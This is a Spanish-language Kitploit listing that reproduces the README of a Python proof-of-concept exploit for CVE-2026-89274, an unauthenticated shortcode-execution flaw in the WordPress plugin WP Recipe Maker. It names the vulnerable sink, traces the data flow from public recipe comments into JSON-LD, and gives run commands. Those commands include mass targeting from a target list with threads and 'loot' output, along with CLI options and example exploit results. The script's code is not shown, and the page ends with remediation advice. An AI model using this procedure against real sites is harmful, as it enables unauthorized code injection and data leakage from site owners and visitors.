Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
By-Poloss..-.CVE-2026-89274 — PoC de exploit en Python para CVE-2026-89274, una vulnerabilidad de ejecución arbitraria de shortcode sin autenticación en WordPress WP Recipe Maker <= 10.8.1 a través de los comentarios de recetas. | Kitploit
Herramientas/GitHubGitHub/polosss/by-poloss..-.cve-2026-89274
Escáneres de VulnerabilidadesAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubpolosss/by-poloss..-.cve-2026-89274

By-Poloss..-.CVE-2026-89274

PoC de exploit en Python para CVE-2026-89274, una vulnerabilidad de ejecución arbitraria de shortcode sin autenticación en WordPress WP Recipe Maker <= 10.8.1 a través de los comentarios de recetas.

Ver Repositorio
hace 5h 3mAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-89274 PoC

Poloss : @WPEF0

status python license

Proof-of-Concept exploit para CVE-2026-89274 — vulnerabilidad de Unauthenticated Arbitrary Shortcode Execution en el plugin de WordPress WP Recipe Maker versión ≤ 10.8.1.

⚠️ ADVERTENCIA LEGAL Y ÉTICA Este script se proporciona solo para investigación de seguridad en entornos locales (localhost/lab) y no debe utilizarse contra sistemas que no sean de su propiedad o sin autorización por escrito. El autor no se hace responsable del mal uso. El uso contra sistemas de terceros sin autorización puede infringir la ley penal.


📌 Resumen de la Vulnerabilidad

CampoValor
CVE IDCVE-2026-89274
ObjetivoWP Recipe Maker (wp-recipe-maker) ≤ 10.8.1
ClaseCode Injection (CWE-94) — Arbitrary Shortcode Execution
CVSS v3.19.1 Critical (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)
VectorContenido de comentarios de recetas (unauthenticated)
Sinkdo_shortcode() en class-wprm-metadata.php
ImpactoEjecución de shortcode server-side → filtración de datos vía JSON-LD público
AuthorPoloss

Root Cause (patch-diff 10.8.1 → 10.8.4)

includes/public/class-wprm-metadata.php :: sanitize_metadata()

Vulnerable (10.8.1):

root@kitploit:~
$sanitized = strip_shortcodes( wp_strip_all_tags( do_shortcode( $metadata ) ) );

do_shortcode() ejecuta el shortcode primero, luego strip_shortcodes() solo limpia su output — no hay protección alguna.

Patched (10.8.4):

root@kitploit:~
$sanitized = strip_shortcodes( wp_strip_all_tags(
    WPRM_Instacart::do_shortcode_safe( $metadata ) ) );

Flujo de Datos

root@kitploit:~
comment_content (comentario público en el post de la receta)
   └─> reviewBody        (class-wprm-metadata.php:1017)
       └─> $metadata['review'][]   (line 1028)
           └─> sanitize_metadata( get_metadata( $recipe ) )  (line 374)
               └─> do_shortcode( $reviewBody )  ← SINK DE EJECUCIÓN
                   └─> wp_json_encode() a <script type="application/ld+json">

Requisitos Previos

  1. El comentario lleva el campo wprm-comment-rating (rellenado vía el formulario de comentarios).
  2. El comentario está aprobado (auto-approve o manual por un moderador).
  3. No se requiere autenticación.

⚙️ Instalación

root@kitploit:~
git clone <repo-url>
cd <repo>
python3 -m venv .venv
source .venv/bin/activate     # Windows: .venv\Scripts\activate
# No hay dependencias externas — solo la librería estándar de Python 3.

Requisitos: Python 3.8+.


🚀 Uso

Objetivo único

root@kitploit:~
python3 CVE-2026-89274.py -u http://localhost:8080 -p 10 \
    --shortcode '[wprm-recipe-name id=11]' \
    --marker 'PoC Recipe'

Múltiples objetivos (archivo)

Formato de targets.txt (uno por línea, url[,post_id]):

root@kitploit:~
http://lab1.local,10
http://lab2.local,25
# las líneas de comentario se ignoran
http://lab3.local,7
root@kitploit:~
python3 CVE-2026-89274.py -f targets.txt -t 10 -o loot.json

Opciones CLI

FlagDefaultDescripción
-u, --url—URL de un único objetivo
-f, --file—Archivo de lista de objetivos (url[,post_id] por línea)
-p, --post10ID del post que contiene la receta
-t, --threads5Número de hilos worker
-o, --outputcve-2026-89274-loot.jsonArchivo de salida JSON
--shortcode[wprm-recipe-name id=11]Payload de shortcode que se ejecuta
--markerPoC RecipeSubstring de prueba de ejecución en reviewBody
--rating5Valor de rating de WPRM
--timeout25Timeout por request (segundos)

🔍 Cómo Funciona el Script

  1. Baseline — GET a la página del post, extrae el bloque <script type="application/ld+json">, recopila reviewBody.
  2. Enviar comentario — POST a /wp-comments-post.php con el payload + el campo wprm-comment-rating.
  3. Polling — GET de nuevo a la página varias veces para detectar la auto-aprobación del comentario.
  4. Verificación — Si --marker aparece en reviewBody → EXPLOITED. Si no → PENDING_APPROVAL.
  5. Salida — Guarda los resultados en JSON.

Estados de Salida

EstadoSignificado
EXPLOITEDShortcode ejecutado y output filtrado al JSON-LD público
PENDING_APPROVALComentario enviado, esperando aprobación del moderador
FAILPágina no accesible / comentario rechazado / error

📄 Ejemplo de Salida JSON

root@kitploit:~
[
  {
    "target": "http://localhost:8080",
    "post_id": 10,
    "shortcode": "[wprm-recipe-name id=11]",
    "marker": "PoC Recipe",
    "author": "poc1716000000",
    "review_bodies": ["PoC Recipe"],
    "status": "EXPLOITED",
    "evidence": "PoC Recipe",
    "note": "shortcode executed server-side; output leaked into public JSON-LD reviewBody",
    "elapsed": 9.12
  }
]

🛡️ Remediación

  • Actualizar WP Recipe Maker a ≥ 10.8.4.
  • Mientras tanto, desactivar los comentarios en los posts de recetas o establecer comment_moderation = 1 y auditar los comentarios de forma estricta.
  • Aplicar una regla WAF para bloquear la sintaxis de shortcode ([...]) en el campo de comentarios.
  • Auditar comentarios antiguos en busca de payloads de shortcode sospechosos.

📁 Estructura del Repo

root@kitploit:~
.
├── CVE-2026-89274.py           # exploit principal
└── README.md                   # este documento
Descargar herramienta